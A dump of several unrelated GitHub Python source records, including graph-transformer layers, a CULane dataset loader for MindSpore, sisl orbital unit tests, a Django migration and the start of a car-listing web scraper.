edge_feats,\n ctx_states=ctx, ctx_edge_index=ctx_edge_index)\n return node_states\n\n\nclass RelativePositionTransformer(RelationalTransformer):\n PADID = 0\n MAXLEN 
= 256\n\n def __init__(self, config:TransformerConfig, **kw):\n config.relvocab_size = self.MAXLEN\n super(RelativePositionTransformer, self).__init__(config, **kw)\n\n def forward(self,\n x: torch.Tensor, # (batsize, seqlen) ids\n ctx: torch.Tensor=None, # (batsize, ctxlen, dim)\n ctx_mask: torch.Tensor=None, # (batsize, ctxlen) bool\n **kwargs):\n edges = []\n edge_ids = []\n ctx_edges = [] if ctx is not None else None\n B, L = x.size()\n ctxL = ctx.size(1) if ctx is not None else None\n for i, x_i in enumerate(x.detach().cpu().numpy()):\n for j in range(len(x_i)):\n x_ij = x_i[j]\n if x_ij != self.PADID:\n edges.append([j + i*L, j + i*L])\n edge_ids.append(0)\n for k in range(j+1, len(x_i)):\n x_ik = x_i[k]\n if x_ik != self.PADID:\n edges.append([j + i*L, k + i*L])\n edges.append([k + i*L, j + i*L])\n assert(abs(j - k) < self.MAXLEN/2)\n edge_ids.append((k - j + self.MAXLEN) % self.MAXLEN)\n edge_ids.append((j - k + self.MAXLEN) % self.MAXLEN)\n if ctx is not None:\n for k in range(0, ctxL):\n if ctx_mask[i, k].detach().cpu().item() != 0:\n ctx_edges.append([k + i*ctxL, j + i*L])\n\n edges = torch.tensor(edges).to(x.device).T\n edge_ids = torch.tensor(edge_ids).to(x.device)\n ctx_edges = torch.tensor(ctx_edges).to(x.device).T if ctx_edges is not None else None\n\n # flatten everything\n x = x.view(-1)\n if ctx is not None:\n ctx = ctx.view(-1, ctx.size(-1))\n\n out = super(RelativePositionTransformer, self).forward(x, edges, edge_ids, ctx=ctx, ctx_edge_index=ctx_edges)\n out = out.view(B, L, out.size(-1))\n\n return out\n\n\nclass MGATConv(MessagePassing):\n def __init__(self,\n indim: int,\n outdim: int=None,\n numheads: int = 1,\n negative_slope: float = 0.2,\n dropout: float = 0.,\n add_self_loops: bool = True,\n bias: bool = True,\n **kwargs):\n super(MGATConv, self).__init__(aggr='add', node_dim=0, **kwargs)\n\n self.indim = indim\n if outdim is None:\n outdim = indim # fall back to the input dimension when outdim is not given\n self.outdim = outdim\n self.numheads = numheads\n self.negative_slope = negative_slope\n self.dropout = dropout\n self.add_self_loops = add_self_loops\n\n assert outdim % numheads == 0, f\" 'outdim' must be divisible by 'numheads' but {outdim} resp. {numheads} given\"\n self.size_per_head = outdim // numheads\n\n self.lin = Linear(indim, outdim, bias=False)\n\n if bias:\n self.bias = Parameter(torch.Tensor(outdim))\n else:\n self.register_parameter('bias', None)\n\n self._alpha = None\n\n self.reset_parameters()\n\n def reset_parameters(self):\n glorot(self.lin.weight)\n zeros(self.bias)\n\n def forward(self, x: Union[Tensor, OptPairTensor], edge_index: Adj,\n size: Size = None, return_attention_weights=False):\n # type: (Union[Tensor, OptPairTensor], Tensor, Size, NoneType) -> Tensor # noqa\n # type: (Union[Tensor, OptPairTensor], SparseTensor, Size, NoneType) -> Tensor # noqa\n # type: (Union[Tensor, OptPairTensor], Tensor, Size, bool) -> Tuple[Tensor, Tuple[Tensor, Tensor]] # noqa\n # type: (Union[Tensor, OptPairTensor], SparseTensor, Size, bool) -> Tuple[Tensor, SparseTensor] # noqa\n r\"\"\"\n\n Args:\n return_attention_weights (bool, optional): If set to :obj:`True`,\n will additionally return the tuple\n :obj:`(edge_index, attention_weights)`, holding the computed\n attention weights for each edge. (default: :obj:`None`)\n \"\"\"\n assert return_attention_weights == False, \"Returning attention weights not supported. 
\"\n H, C = self.numheads, self.size_per_head\n\n assert x.dim() == 2, 'Static graphs not supported in `GATConv`.'\n x_l = x_r = self.lin(x).view(x.size(0), H, C)\n\n if self.add_self_loops:\n if isinstance(edge_index, Tensor):\n num_nodes = x_l.size(0)\n num_nodes = size[1] if size is not None else num_nodes\n num_nodes = x_r.size(0) if x_r is not None else num_nodes\n edge_index, _ = remove_self_loops(edge_index)\n edge_index, _ = add_self_loops(edge_index, num_nodes=num_nodes)\n elif isinstance(edge_index, SparseTensor):\n edge_index = set_diag(edge_index)\n\n # propagate_type: (x: OptPairTensor, alpha: OptPairTensor)\n out = self.propagate(edge_index, x=(x_l, x_r), size=size)\n\n out = out.view(-1, self.heads * self.size_per_head)\n\n if self.bias is not None:\n out += self.bias\n\n return out\n\n def message(self,\n x_j: Tensor,\n x_i: Tensor,\n edge_index_i: Tensor,\n edge_index_j: Tensor,\n size_i: Optional[int]) -> Tensor:\n attention_scores = (x_j * x_i).sum(-1)\n alpha = softmax(attention_scores, edge_index_i, num_nodes=size_i)\n alpha = F.dropout(alpha, p=self.dropout, training=self.training)\n ret = x_j * alpha.unsqueeze(-1) # weigh the incoming states by alphas\n return ret\n\n def __repr__(self):\n return '{}({}, {}, heads={})'.format(self.__class__.__name__,\n self.in_channels,\n self.out_channels, self.heads)\n\n\ndef try_mgat_conv():\n m = MGATConv(5, 6, numheads=2)\n\n x = torch.randn(4, 5)\n edge_index = torch.tensor([[0, 1, 2, 3], [0, 0, 1, 1]])\n out = m(x, edge_index)\n\n print(out)\n\n\ndef try_transformer_attn_conv():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n m = TransformerAttentionConv(conf)\n\n q = torch.randn(4, 6)\n kv = torch.randn(7, 6)\n\n edge_index = torch.tensor([[0, 2, 4, 6],[0, 1, 2, 3]])\n # edge_features = torch.randn(4, 6)\n\n out = m(edge_index, x=q, kv=kv)\n\n print(out)\n\n\ndef try_relational_transformer_attn_conv():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n m = RelationalTransformerAttentionConv(conf)\n\n q = torch.randn(4, 6)\n kv = torch.randn(7, 6)\n\n edge_index = torch.tensor([[0, 2, 4, 6],[0, 1, 2, 3]])\n edge_features = torch.randn(4, 6)\n\n out = m(edge_index, x=q, kv=kv, edge_features=edge_features)\n\n print(out)\n\n\ndef try_relational_transformer():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n conf.vocab_size = 11\n conf.relvocab_size = 3\n\n node_ids = torch.randint(1, conf.vocab_size, (5,))\n edge_index = torch.tensor([[0, 1, 2, 3, 4, 0, 1, 2, 3, 4], [1, 2, 3, 4, 0, 4, 0, 1, 2, 3]])\n edge_ids = torch.randint(1, conf.relvocab_size, (10,))\n\n m = RelationalTransformer(conf)\n\n out = m(node_ids, edge_index, edge_ids)\n\n print(out)\n\n\ndef try_relative_position_transformer():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n conf.vocab_size = 11\n\n m = RelativePositionTransformer(conf)\n\n x = torch.tensor([\n [1, 2, 3, 0, 0, 0],\n [4, 5, 3, 6, 7, 9],\n [10, 0, 0, 0, 0, 0]\n ])\n\n out = m(x)\n print(out)\n\n print(out.size())\n\n out[1, -1].sum().backward()\n print(m.node_emb.weight.grad)\n\n\ndef try_relative_position_transformer_with_context():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n conf.vocab_size = 11\n conf.is_decoder = True\n\n m = RelativePositionTransformer(conf)\n\n x = torch.tensor([\n [1, 2, 3, 0, 0, 0],\n [4, 5, 3, 6, 7, 9],\n [10, 0, 0, 0, 0, 0]\n ])\n\n ctx = torch.nn.Parameter(torch.randn(3, 4, 6))\n ctx_mask = 
torch.tensor([\n [1, 1, 0, 0],\n [0, 0, 0, 0],\n [1, 1, 1, 1]\n ])\n\n out = m(x, ctx=ctx, ctx_mask=ctx_mask)\n print(out)\n\n print(out.size())\n\n out[0, 0].sum().backward()\n print(m.node_emb.weight.grad)\n print(ctx.grad)\n\n\nif __name__ == '__main__':\n # try_mgat_conv()\n # try_transformer_attn_conv()\n # try_relational_transformer_attn_conv()\n # try_relational_transformer()\n # try_relative_position_transformer()\n try_relative_position_transformer_with_context()","repo_name":"lukovnikov/parseq","sub_path":"parseq/reltm.py","file_name":"reltm.py","file_ext":"py","file_size_in_byte":18830,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"25563162983","text":"# Copyright 2021-2022 Huawei Technologies Co., Ltd\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# ============================================================================\r\n\"\"\"create train or eval dataset.\"\"\"\r\n\r\nimport os\r\nimport cv2\r\nimport warnings\r\nimport numpy as np\r\nimport mindspore.dataset as de\r\nimport mindspore.dataset.vision.c_transforms as C\r\nfrom .model_utils.config import config\r\nimport imgaug as ia\r\nimport imgaug.augmenters as iaa\r\nfrom imgaug.augmentables.lines import LineString as ia_LineString\r\nfrom imgaug.augmentables.lines import LineStringsOnImage\r\nfrom .lane_augmentation import get_fastdraw_aug, get_infer_aug\r\nfrom .lane_geometry import FloatLengthLine, PointSelf, load_CULaneFile, load_lines, to_LineStringsStruct\r\nfrom mindspore.mindrecord import FileWriter\r\nfrom .lane_codec import encode\r\n\r\n\r\nif config.device_target == \"Ascend\":\r\n np_cast_type = np.float16\r\nelse:\r\n np_cast_type = np.float32\r\n\r\ndef resize_by_wh(*, img, width, height):\r\n dim = (width, height)\r\n resized = cv2.resize(img, dim, interpolation=cv2.INTER_LINEAR)\r\n return resized\r\n\r\ndef create_culane_label(is_training):\r\n culane_root = config.culane_root\r\n data_type = config.val_data_type\r\n if is_training:\r\n data_type = config.train_data_type\r\n\r\n images_list_path = os.path.join(culane_root, 'list', '{}.txt'.format(data_type))\r\n images_list = load_lines(images_list_path)\r\n images_annos_path = []\r\n images_num = len(images_list)\r\n for ind, img_list in enumerate(images_list):\r\n path_pair = dict(\r\n image_path=os.path.join(culane_root, img_list[1:]),\r\n anno_path=os.path.join(culane_root, img_list[1:].replace('.jpg', '.lines.txt')))\r\n images_annos_path.append(path_pair)\r\n\r\n if (ind + 1) % 10 == 0:\r\n print(\"{}/{}: parsing annotation for image={}\".format(ind + 1, images_num, img_list))\r\n return images_annos_path\r\n\r\ndef data_to_mindrecord_byte_image(dataset=\"culane\", is_training=True, prefix=\"culane.mindrecord\", file_num=1):\r\n \"\"\"Create MindRecord file.\"\"\"\r\n mindrecord_dir = config.mindrecord_dir\r\n mindrecord_path = os.path.join(mindrecord_dir, prefix)\r\n\r\n writer = FileWriter(mindrecord_path, file_num, overwrite=True)\r\n if dataset == 
\"culane\":\r\n images_annos = create_culane_label(is_training)\r\n else:\r\n print(\"Error unsupported other dataset\")\r\n return\r\n\r\n relaychain_json = {\r\n \"image\": {\"type\": \"bytes\"},\r\n \"all_points\": {\"type\": \"int32\", 'shape': [-1]},\r\n \"points_onelane\": {\"type\": \"int32\", 'shape': [-1]}\r\n }\r\n\r\n writer.add_schema(relaychain_json, \"culane_json\")\r\n\r\n image_files_num = len(images_annos)\r\n for ind, image_anno in enumerate(images_annos):\r\n image_path, anno_path = image_anno['image_path'], image_anno['anno_path']\r\n with open(image_path, 'rb') as f:\r\n img = f.read()\r\n\r\n image_shape = (config.image_height, config.image_width)\r\n anno_lanes, all_points, per_num = load_CULaneFile(anno_path, image_shape)\r\n all_points = np.array(all_points, dtype=np.int32)\r\n per_num = np.array(per_num, dtype=np.int32)\r\n row = {\"image\": img, \"all_points\": all_points, 'points_onelane': per_num}\r\n if (ind + 1) % 10 == 0:\r\n print(\"writing {}/{} into mindrecord\".format(ind + 1, image_files_num))\r\n writer.write_raw_data([row])\r\n\r\n writer.commit()\r\n\r\n\r\ndef preprocess_fn(image, all_points, points_onelane, is_training):\r\n \"\"\"Data augmentation function.\"\"\"\r\n\r\n resize_height = config.resize_height\r\n resize_width = config.resize_width\r\n\r\n image_bgr = image.copy()\r\n image_bgr[:, :, 0] = image[:, :, 2]\r\n image_bgr[:, :, 1] = image[:, :, 1]\r\n image_bgr[:, :, 2] = image[:, :, 0]\r\n image_shape = image_bgr.shape[:2]\r\n\r\n lanes_tuple = []\r\n start = 0\r\n for num in points_onelane:\r\n num_point = int(num*2)\r\n lane = []\r\n lane_points = all_points[start:num_point+start]\r\n for i in range(0, len(lane_points), 2):\r\n lane.append((float(lane_points[i]), float(lane_points[i+1])))\r\n start += num_point\r\n lanes_tuple.append(lane)\r\n\r\n lss = [ia_LineString(lane_tuple) for lane_tuple in lanes_tuple]\r\n\r\n if is_training:\r\n aug = get_fastdraw_aug()\r\n lsoi = LineStringsOnImage(lss, shape=image_shape)\r\n batch = ia.Batch(images=[image_bgr], line_strings=[lsoi])\r\n batch_aug = list(aug.augment_batches([batch]))[0] # augment_batches returns a generator\r\n image_aug = batch_aug.images_aug[0]\r\n lsoi_aug = batch_aug.line_strings_aug[0]\r\n\r\n new_image = cv2.resize(image_aug, (800, 320))\r\n new_image = new_image.astype(np_cast_type)\r\n new_lanes = []\r\n for shapely_line in lsoi_aug:\r\n line_spec = FloatLengthLine(width=image_shape[1], height=image_shape[0])\r\n for kpt in shapely_line.to_keypoints():\r\n line_spec.append(PointSelf(x=kpt.x, y=kpt.y, score=1.0))\r\n line_spec.expand_(resize_width, resize_height)\r\n new_lanes.append(line_spec)\r\n new_lanes = to_LineStringsStruct(new_lanes)\r\n\r\n segment, up_arrow, down_arrow, up_bound, down_bound = encode(new_lanes)\r\n print(segment.shape, up_arrow.shape)\r\n\r\n return new_image, segment, up_arrow, down_arrow, up_bound, down_bound\r\n\r\n else:\r\n aug = get_infer_aug()\r\n lss = []\r\n lsoi = LineStringsOnImage(lss, shape=image_shape)\r\n batch = ia.Batch(images=[image], line_strings=[lsoi])\r\n batch_aug = list(aug.augment_batches([batch]))[0]\r\n image_aug = batch_aug.images_aug[0]\r\n\r\n new_image = resize_by_wh(img=image_aug, width=resize_width, height=resize_height)\r\n new_image = new_image.astype(np_cast_type)\r\n # new_lanes = ['infer_no_aug']\r\n\r\n return new_image\r\n\r\n\r\ndef create_culane_dataset(mindrecord_file,\r\n batch_size=2,\r\n device_num=1,\r\n rank_id=0,\r\n is_training=True,\r\n num_parallel_workers=8):\r\n cv2.setNumThreads(0)\r\n 
de.config.set_prefetch_size(8)\r\n ds = de.MindDataset(mindrecord_file, columns_list=[\"image\", \"all_points\", 'points_onelane'],\r\n num_shards=device_num, shard_id=rank_id,\r\n num_parallel_workers=1, shuffle=is_training)\r\n\r\n decode = C.Decode()\r\n ds = ds.map(operations=decode, input_columns=[\"image\"])\r\n compose_map_func = (lambda image, all_points, points_onelane:\r\n preprocess_fn(image, all_points, points_onelane, is_training))\r\n\r\n if is_training:\r\n ds = ds.map(operations=compose_map_func,\r\n input_columns=[\"image\", \"all_points\", 'points_onelane'],\r\n output_columns=[\"image\", \"segment\", \"up_arrow\", \"down_arrow\", \"up_bound\", \"down_bound\"],\r\n column_order=[\"image\", \"segment\", \"up_arrow\", \"down_arrow\", \"up_bound\", \"down_bound\"],\r\n python_multiprocessing=False,\r\n num_parallel_workers=num_parallel_workers)\r\n ds = ds.batch(batch_size, drop_remainder=True, pad_info=None)\r\n\r\n\r\n else:\r\n ds = ds.map(operations=compose_map_func,\r\n input_columns=[\"image\", \"all_points\", 'points_onelane'],\r\n output_columns=[\"image\"],\r\n column_order=[\"image\",],\r\n num_parallel_workers=num_parallel_workers)\r\n ds = ds.batch(batch_size, drop_remainder=True)\r\n\r\n return ds\r\n","repo_name":"lpplbiubiubiub/RCLane","sub_path":"src/culane_dataset.py","file_name":"culane_dataset.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"70969082753","text":"import sys\nimport os.path\nfrom .pyqtgraph_vini.Qt import QtCore, QtGui\nimport numpy as np\nimport math\nimport os\nimport copy\n\nfrom .pyqtgraph_vini import *\n\nfrom .ColorMapWidget import *\nfrom .SliceWidget import *\nfrom .SliceBox import *\nfrom .ImageItemMod import *\n\n\nclass SingleSlice(QtGui.QWidget):\n \"\"\"\n Class to display a single slice (popout window).\n \"\"\"\n\n def __init__(self, view):\n super(SingleSlice, self).__init__()\n\n # n - 1 should be zero, regardless of the fill-value\n r0 = orb0.radial(r)\n r1 = orb1.radial(r)\n rr = np.stack((r, np.zeros(len(r)), np.zeros(len(r))), axis=1)\n r2 = orb1.radial((rr**2).sum(-1) ** 0.5)\n assert np.allclose(r0, r1)\n assert np.allclose(r0, r2)\n r[r >= rf[0].max()] = 0.0\n assert np.allclose(r0, r)\n assert np.allclose(r1, r)\n\n def test_psi1(self):\n rf = r_f(6)\n orb0 = SphericalOrbital(0, rf)\n orb1 = SphericalOrbital(1, rf)\n r = np.linspace(0, 6, 333 * 3).reshape(-1, 3)\n p0 = orb0.psi(r)\n p1 = orb1.psi(r)\n assert not np.allclose(p0, p1)\n orb0 = SphericalOrbital(1, rf)\n assert orb0.equal(orb1, radial=True, psi=True)\n\n for m in range(orb0.l, orb0.l + 1):\n p0 = orb0.psi(r, -1)\n p1 = orb1.psi(r, -1)\n assert np.allclose(p0, p1)\n p0 = orb0.psi(r, -1)\n p1 = orb1.psi(r, 1)\n assert not np.allclose(p0, p1)\n\n def test_radial_func1(self):\n r = np.linspace(0, 4, 300)\n f = np.exp(-r)\n o = SphericalOrbital(1, (r, f), R=4.0)\n str(o)\n\n def i_univariate(r, f):\n return interp.UnivariateSpline(r, f, k=5, s=0, ext=1, check_finite=False)\n\n def i_interp1d(r, f):\n return interp.interp1d(\n r, f, kind=\"cubic\", fill_value=(f[0], 0.0), bounds_error=False\n )\n\n def i_spline(r, f):\n from functools import partial\n\n tck = interp.splrep(r, f, k=5, s=0)\n return partial(interp.splev, tck=tck, der=0, ext=1)\n\n # Interpolation radius\n R = np.linspace(0, 5, 400)\n\n assert np.allclose(o.radial(r), f)\n f_default = o.radial(R)\n\n o.set_radial(r, f, interp=i_univariate)\n assert np.allclose(o.radial(r), f)\n f_univariate 
= o.radial(R)\n o.set_radial(r, f, interp=i_interp1d)\n assert np.allclose(o.radial(r), f)\n f_interp1d = o.radial(R)\n\n o.set_radial(r, f, interp=i_spline)\n assert np.allclose(o.radial(r), f)\n f_spline = o.radial(R)\n\n # Checks that they are equal\n assert np.allclose(f_univariate, f_interp1d)\n assert np.allclose(f_univariate, f_spline)\n assert np.allclose(f_univariate, f_default)\n\n def test_same1(self):\n rf = r_f(6)\n o0 = SphericalOrbital(0, rf)\n o1 = Orbital(o0.R)\n assert o0.equal(o1)\n assert not o0.equal(Orbital(3.0))\n\n def test_toatomicorbital1(self):\n rf = r_f(6)\n # Check m and l\n for l in range(_max_l + 1):\n orb = SphericalOrbital(l, rf)\n ao = orb.toAtomicOrbital()\n assert len(ao) == 2 * l + 1\n m = -l\n for a in ao:\n assert a.l == orb.l\n assert a.m == m\n m += 1\n\n orb = SphericalOrbital(1, rf)\n ao = orb.toAtomicOrbital(1)\n assert ao.l == orb.l\n assert ao.m == 1\n ao = orb.toAtomicOrbital(-1)\n assert ao.l == orb.l\n assert ao.m == -1\n ao = orb.toAtomicOrbital(0)\n assert ao.l == orb.l\n assert ao.m == 0\n ao = orb.toAtomicOrbital([0, -1, 1])\n for a in ao:\n assert a.l == orb.l\n assert ao[0].m == 0\n assert ao[1].m == -1\n assert ao[2].m == 1\n\n def test_toatomicorbital2(self):\n rf = r_f(6)\n orb = SphericalOrbital(1, rf)\n with pytest.raises(ValueError):\n ao = orb.toAtomicOrbital(2)\n\n def test_toatomicorbital_q0(self):\n rf = r_f(6)\n orb = SphericalOrbital(0, rf, 2.0)\n\n # Check m and l\n for l in range(_max_l + 1):\n orb = SphericalOrbital(l, rf, 2.0)\n ao = orb.toAtomicOrbital()\n assert ao[0].q0 == pytest.approx(2.0 / (2 * l + 1))\n\n def test_pickle1(self):\n rf = r_f(6)\n import pickle as p\n\n o0 = SphericalOrbital(1, rf)\n o1 = SphericalOrbital(2, rf)\n p0 = p.dumps(o0)\n p1 = p.dumps(o1)\n l0 = p.loads(p0)\n l1 = p.loads(p1)\n assert o0 == l0\n assert o1 == l1\n assert o0 != l1\n assert o1 != l0\n\n def test_togrid1(self):\n o = SphericalOrbital(1, r_f(6))\n o.toGrid()\n o.toGrid(R=10)\n\n def test_togrid2(self):\n o = SphericalOrbital(1, r_f(6))\n with pytest.raises(ValueError):\n o.toGrid(R=-1)\n\n\nclass Test_atomicorbital:\n def test_init1(self):\n rf = r_f(6)\n a = []\n a.append(AtomicOrbital(2, 1, 0, 1, True, rf))\n a.append(AtomicOrbital(l=1, m=0, zeta=1, P=True, spherical=rf))\n f = interp.interp1d(\n rf[0], rf[1], fill_value=(0.0, 0.0), bounds_error=False, kind=\"cubic\"\n )\n a.append(AtomicOrbital(l=1, m=0, zeta=1, P=True, spherical=f))\n a.append(AtomicOrbital(\"pzP\", f))\n a.append(AtomicOrbital(\"pzP\", rf))\n a.append(AtomicOrbital(\"2pzP\", rf))\n for i in range(len(a) - 1):\n for j in range(i + 1, len(a)):\n assert a[i] == a[j] and a[i].equal(a[j], psi=True, radial=True)\n\n def test_init2(self):\n assert AtomicOrbital(\"pzP\") == AtomicOrbital(n=2, l=1, m=0, P=True)\n\n def test_init3(self):\n rf = r_f(6)\n for l in range(_max_l + 1):\n a = AtomicOrbital(l=l, m=0, spherical=rf)\n a.name()\n a.name(True)\n str(a)\n a = AtomicOrbital(l=l, m=0, P=True, spherical=rf, tag=\"hello\")\n a.name()\n a.name(True)\n str(a)\n\n def test_init4(self):\n rf = r_f(6)\n o1 = AtomicOrbital(2, 1, 0, 1, True, rf)\n o2 = AtomicOrbital(\"pzP\", rf)\n o3 = AtomicOrbital(\"pzZP\", rf)\n o4 = AtomicOrbital(\"pzZ1P\", rf)\n o5 = AtomicOrbital(\"2pzZ1P\", rf)\n assert o1 == o2\n assert o1 == o3\n assert o1 == o4\n assert o1 == o5\n\n def test_init5(self):\n with pytest.raises(ValueError):\n AtomicOrbital(5, _max_l + 1, 0)\n\n def test_copy(self):\n rf = r_f(6)\n orb = AtomicOrbital(\"pzP\", rf, R=2.0)\n assert orb.R == orb.copy().R\n assert 
orb.R == pytest.approx(2.0)\n orb = AtomicOrbital(\"pzP\", rf)\n assert orb.R == orb.copy().R\n\n def test_radial1(self):\n rf = r_f(6)\n r = np.linspace(0, 6, 100)\n for l in range(_max_l + 1):\n so = SphericalOrbital(l, rf)\n sor = so.radial(r)\n for m in range(-l, l + 1):\n o = AtomicOrbital(l=l, m=m, spherical=rf)\n assert np.allclose(sor, o.radial(r))\n o.set_radial(rf[0], rf[1])\n assert np.allclose(sor, o.radial(r))\n\n def test_phi1(self):\n rf = r_f(6)\n r = np.linspace(0, 6, 999).reshape(-1, 3)\n for l in range(_max_l + 1):\n so = SphericalOrbital(l, rf)\n for m in range(-l, l + 1):\n o = AtomicOrbital(l=l, m=m, spherical=rf)\n assert np.allclose(so.psi(r, m), o.psi(r))\n\n def test_pickle1(self):\n import pickle as p\n\n rf = r_f(6)\n o0 = AtomicOrbital(2, 1, 0, 1, True, rf, tag=\"hello\", q0=1.0)\n o1 = AtomicOrbital(l=1, m=0, zeta=1, P=False, spherical=rf)\n o2 = AtomicOrbital(l=1, m=0, zeta=1, P=False)\n p0 = p.dumps(o0)\n p1 = p.dumps(o1)\n p2 = p.dumps(o2)\n l0 = p.loads(p0)\n l1 = p.loads(p1)\n l2 = p.loads(p2)\n assert o0 == l0\n assert o1 == l1\n assert o2 == l2\n assert o0 != l1\n assert o1 != l0\n assert o2 != l0\n\n\nclass Test_hydrogenicorbital:\n def test_init(self):\n orb = HydrogenicOrbital(2, 1, 0, 3.2)\n\n def test_basic1(self):\n orb = HydrogenicOrbital(2, 1, 0, 3.2, R=4.0)\n assert orb.R == orb.copy().R\n assert orb.R == pytest.approx(4.0)\n orb = HydrogenicOrbital(2, 1, 0, 3.2)\n assert orb.R == orb.copy().R\n\n def test_copy(self):\n orb = HydrogenicOrbital(2, 1, 0, 3.2, tag=\"test\", q0=2.5)\n orb2 = orb.copy()\n assert orb.n == orb2.n\n assert orb.l == orb2.l\n assert orb.m == orb2.m\n assert orb.q0 == orb2.q0\n assert orb.tag == orb2.tag\n\n def test_normalization(self):\n for n in range(6):\n zeff = n * 0.9\n for l in range(n):\n orb = HydrogenicOrbital(n, l, 0, zeff)\n x = np.linspace(0, orb.R, 1000, endpoint=True)\n Rnl = orb.radial(x)\n I = np.trapz(x**2 * Rnl**2, x=x)\n assert abs(I - 1) < 1e-4\n\n def test_togrid(self):\n for n in range(3):\n zeff = n * 0.9\n for l in range(n):\n for m in range(-l, l + 1):\n orb = HydrogenicOrbital(n, l, m, zeff)\n g = orb.toGrid(0.1)\n I = (g.grid**2).sum() * g.dvolume\n assert abs(I - 1) < 1e-3\n\n def test_pickle(self):\n import pickle as p\n\n o0 = HydrogenicOrbital(2, 1, 0, 3.2, tag=\"test\", q0=2.5)\n o1 = HydrogenicOrbital(2, 1, 0, 3.2)\n p0 = p.dumps(o0)\n p1 = p.dumps(o1)\n l0 = p.loads(p0)\n l1 = p.loads(p1)\n assert o0 == l0\n assert o1 == l1\n assert o0 != l1\n assert o1 != l0\n\n\nclass Test_GTO:\n def test_init(self):\n alpha = [1, 2]\n coeff = [0.1, 0.44]\n orb = GTOrbital(2, 1, 0, alpha, coeff)\n assert orb.R > 0\n\n def test_copy(self):\n alpha = [1, 2]\n coeff = [0.1, 0.44]\n orb = GTOrbital(2, 1, 0, alpha, coeff, R=4.0)\n assert orb.R == orb.copy().R\n assert orb.R == pytest.approx(4.0)\n orb = GTOrbital(2, 1, 0, alpha, coeff)\n assert orb.R == orb.copy().R\n\n def test_gto_funcs(self):\n alpha = [0.1688, 0.6239, 3.425]\n coeff = [0.4, 0.7, 1.3]\n x = np.linspace(0, 10, 1000)\n orb = GTOrbital(2, 1, 0, alpha, coeff, R=x[-1])\n assert orb.R == pytest.approx(x[-1])\n Rnl = orb.radial(x)\n\n R = np.random.rand(10, 3)\n orb.psi(R)\n\n theta, phi = np.random.rand(2, 10)\n orb.spher(theta, phi)\n\n orb.psi_spher((R**2).sum(-1) ** 0.5, theta, phi)\n\n\nclass Test_STO:\n def test_init(self):\n alpha = [1, 2]\n coeff = [0.1, 0.44]\n orb = STOrbital(2, 1, 0, alpha, coeff)\n assert orb.R > 0\n\n def test_copy(self):\n alpha = [1, 2]\n coeff = [0.1, 0.44]\n orb = STOrbital(2, 1, 0, alpha, coeff, R=4.0)\n 
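A standalone check (not part of the sisl test suite) of the radial normalization integral that test_normalization above relies on: a normalized radial function R(r) satisfies the integral of r^2 R(r)^2 dr = 1, shown here for the analytic hydrogen 1s function R(r) = 2 exp(-r) in atomic units.

import numpy as np

x = np.linspace(0, 40, 20000)
Rnl = 2.0 * np.exp(-x)  # hydrogen 1s radial function (Z=1, Bohr units)
I = np.trapz(x**2 * Rnl**2, x=x)
assert abs(I - 1) < 1e-4  # analytically, 4 * integral(r^2 exp(-2r)) = 4 * 2/8 = 1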
assert orb.R == orb.copy().R\n assert orb.R == pytest.approx(4.0)\n orb = STOrbital(2, 1, 0, alpha, coeff)\n assert orb.R == orb.copy().R\n\n def test_sto_funcs(self):\n alpha = [0.1688, 0.6239, 3.425]\n coeff = [0.4, 0.7, 1.3]\n x = np.linspace(0, 10, 1000)\n orb = STOrbital(2, 1, 0, alpha, coeff, R=x[-1])\n assert orb.R == pytest.approx(x[-1])\n Rnl = orb.radial(x)\n\n R = np.random.rand(10, 3)\n orb.psi(R)\n\n theta, phi = np.random.rand(2, 10)\n orb.spher(theta, phi)\n\n orb.psi_spher((R**2).sum(-1) ** 0.5, theta, phi)\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/tests/test_orbital.py","file_name":"test_orbital.py","file_ext":"py","file_size_in_byte":15120,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"39807420455","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cashflow', '0003_auto_20170227_1313'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='cashchange',\n name='plan_link',\n field=models.ForeignKey(default=None, verbose_name=b'plan', to='cashflow.PlanLink'),\n preserve_default=False,\n ),\n ]\n","repo_name":"likangwei/cashflow","sub_path":"cashflow/migrations/0004_cashchange_plan_link.py","file_name":"0004_cashchange_plan_link.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12267318878","text":"import bs4\nimport requests\n\n\n \n\n\n\ndef get_data(link):\n\n data_to_send = []\n data_to_get = []\n req6 = requests.get(link)\n soup6 = bs4.BeautifulSoup(req6.text,\"html.parser\")\n # Car Name\n data9 = soup6.find(\"div\", attrs={\"class\": \"gsc_col-xs-12 gsc_col-sm-12 gsc_col-md-7 gsc_col-lg-7 overviewdetail\"})\n data_to_send.append(data9.h1.get_text())\n\n # Car Price\n data10 = data9.find(\"div\", attrs={\"class\": \"price\"})\n if data10 is None:\n data_to_send.append(\"variant expired\")\n else:\n price = data10.get_text().split('*')\n data_to_send.append(price[0])\n\n #---------------car details----------------------------------\n\n data7 = soup6.find_all(\"table\", attrs={\"class\": \"keyfeature\"})\n if len(data7) == 13:\n data_in_td = data7[2:7]\n data_in_single = data7[7:-1]\n elif len(data7) == 12:\n data_in_td = 